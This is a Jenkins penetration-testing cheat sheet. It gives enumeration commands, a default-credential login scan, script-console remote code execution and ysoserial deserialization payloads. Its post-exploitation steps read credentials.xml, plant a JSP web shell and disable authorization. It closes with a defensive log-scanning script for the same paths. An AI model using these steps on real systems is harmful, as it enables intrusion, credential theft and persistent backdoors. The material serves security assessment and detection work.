Attacking Jenkins - Focused Commands & Key Points

1. Jenkins Version Detection:

curl -I http://<target>:8080/
  • Jenkins reports its version in the HTTP response headers.

nmap -sV -p 8080 <target_ip>
  • Nmap version detection.

curl http://<target>:8080/jenkins/cli/ | grep -i "Jenkins CLI"
  • Check for Jenkins CLI.


2. Jenkins Port Enumeration:

  • Default Ports:

    • 8080 (HTTP Web Interface)

    • 50000 (inbound agent communication, historically called the slave port; often overlooked)

nmap -sV -p 50000 <target_ip>
  • Confirm whether the agent communication port is exposed.


3. Jenkins CLI Enumeration:

java -jar jenkins-cli.jar -s http://<target>:8080/jenkins/ help
java -jar jenkins-cli.jar -s http://<target>:8080/jenkins/ list-plugins
java -jar jenkins-cli.jar -s http://<target>:8080/jenkins/ list-jobs
  • Enumerate jobs, plugins, and (where permitted) users via the Jenkins CLI; help lists the commands available to the caller, which depends on the caller's permissions.


4. Jenkins Plugin Enumeration:

curl http://<target>:8080/jenkins/pluginManager/
  • List installed plugins and their versions; outdated plugins are a common vulnerability source.


5. Jenkins Security Realm Enumeration:

curl http://<target>:8080/jenkins/configureSecurity/
  • Identify authentication methods (Jenkins DB, LDAP, etc.).


6. Jenkins API Enumeration:

curl http://<target>:8080/jenkins/api/
curl http://<target>:8080/jenkins/api/json
  • Identify API endpoints that might expose sensitive data.


7. Jenkins Access Control Enumeration:

curl http://<target>:8080/jenkins/configureSecurity/
  • Identify access control misconfigurations, such as overly permissive anonymous access.


8. Jenkins Exploitation:

  • Exploiting Weak Credentials

    • Check for default credentials (admin:admin, admin:password).

msf6 > use auxiliary/scanner/http/jenkins_login
msf6 auxiliary(scanner/http/jenkins_login) > set RHOSTS <target_ip>
msf6 auxiliary(scanner/http/jenkins_login) > run

  • Exploiting Script Console (Authenticated RCE)

java -jar jenkins-cli.jar -s http://<target>:8080/jenkins/ groovysh
println "Attacker Shell"
  • Groovy entered here runs on the Jenkins controller, like the web Script Console; both require administrator permission, which is why this is RCE for an admin-level account.

  • Exploiting Build Job Execution

curl -X POST http://<target>:8080/jenkins/job/test/build
  • Trigger a job execution for exploitation.


9. Jenkins Deserialization Vulnerabilities:

  • Use ysoserial to generate payloads.

java -jar ysoserial-all.jar CommonsCollections5 "<payload>" | base64
  • Inject payloads into vulnerable endpoints.


10. Jenkins Post-Exploitation & Persistence:

  • Extract Credentials from credentials.xml

cat /var/lib/jenkins/credentials.xml

  • Establish Persistence:

cp backdoor.jsp /var/lib/jenkins/jobs/

  • Modify Access Control for Future Access:

jenkins.security.AuthorizationStrategy$Unsecured

Key Takeaways:

  • Jenkins Manager Access: administrator-level access gives RCE via the Jenkins Script Console.

  • Weak Credentials: Default or weak credentials often present.

  • Plugin Enumeration: Plugins are a frequent source of vulnerabilities.

  • Jenkins API Exposure: Can expose sensitive information.

  • Access Control Issues: Misconfigurations lead to privilege escalation.

  • Deserialization Attacks: Exploit Java deserialization vulnerabilities.

  • Web Shell Persistence: Deploy malicious JSP for long-term access.
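As an added example (not part of the original cheat sheet), the following Python scans reverse-proxy access logs for hits on the Jenkins paths this page enumerates and exploits: the Script Console, the CLI, the security configuration page, the plugin manager and job build triggers. It assumes a reverse proxy in front of Jenkins writing combined-format logs and a /jenkins context path; the sample log lines are constructed.

```python
import re

# Paths from this page that warrant an alert, relative to the /jenkins context path.
SENSITIVE = {"/script": "script console", "/scriptText": "script console",
             "/cli": "Jenkins CLI", "/configureSecurity": "security configuration",
             "/pluginManager": "plugin inventory"}
BUILD_RE = re.compile(r"^/job/[^/]+/build(WithParameters)?$")
# Combined log format from an assumed reverse proxy in front of Jenkins; the
# third field is "-" when the request carried no authenticated user.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample lines: an anonymous config read, a refused and then an
# authenticated script console call, a job trigger and a harmless page view.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Mar/2024:10:00:01 +0000] "GET /jenkins/configureSecurity/ HTTP/1.1" 200 9001 "-" "curl/8.0"',
    '10.0.0.5 - - [01/Mar/2024:10:00:03 +0000] "POST /jenkins/scriptText HTTP/1.1" 403 88 "-" "curl/8.0"',
    '10.0.0.5 - admin [01/Mar/2024:10:00:05 +0000] "POST /jenkins/scriptText HTTP/1.1" 200 21 "-" "curl/8.0"',
    '10.0.0.7 - bob [01/Mar/2024:10:01:00 +0000] "POST /jenkins/job/test/build HTTP/1.1" 201 0 "-" "python-requests/2.31"',
    '10.0.0.9 - alice [01/Mar/2024:10:02:00 +0000] "GET /jenkins/job/test/ HTTP/1.1" 200 4000 "-" "Mozilla/5.0"',
]


def classify(path, context="/jenkins"):
    """Return a sensitivity label for a request path, or None if uninteresting."""
    path = path.split("?", 1)[0]
    if context and path.startswith(context + "/"):
        path = path[len(context):]
    path = path.rstrip("/") or "/"
    for prefix, label in SENSITIVE.items():
        if path == prefix or path.startswith(prefix + "/"):
            return label
    return "job build trigger" if BUILD_RE.match(path) else None


def scan(lines, context="/jenkins"):
    """One finding per sensitive request; 'critical' marks a successful
    unauthenticated hit or any successful script console call."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)  # lines not in combined log format are skipped
        label = classify(m["path"], context) if m else None
        if label is None:
            continue
        ok, anon = 200 <= int(m["status"]) < 300, m["user"] == "-"
        findings.append({"ip": m["ip"], "user": m["user"], "label": label,
                         "status": int(m["status"]), "succeeded": ok, "anonymous": anon,
                         "critical": ok and (anon or label == "script console")})
    return findings
```

A successful anonymous read of configureSecurity or any successful script console call is flagged critical; blocked attempts are still returned so repeated probing from one source is visible.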

Used together, these sections serve as a reference for Jenkins security assessment and penetration testing.
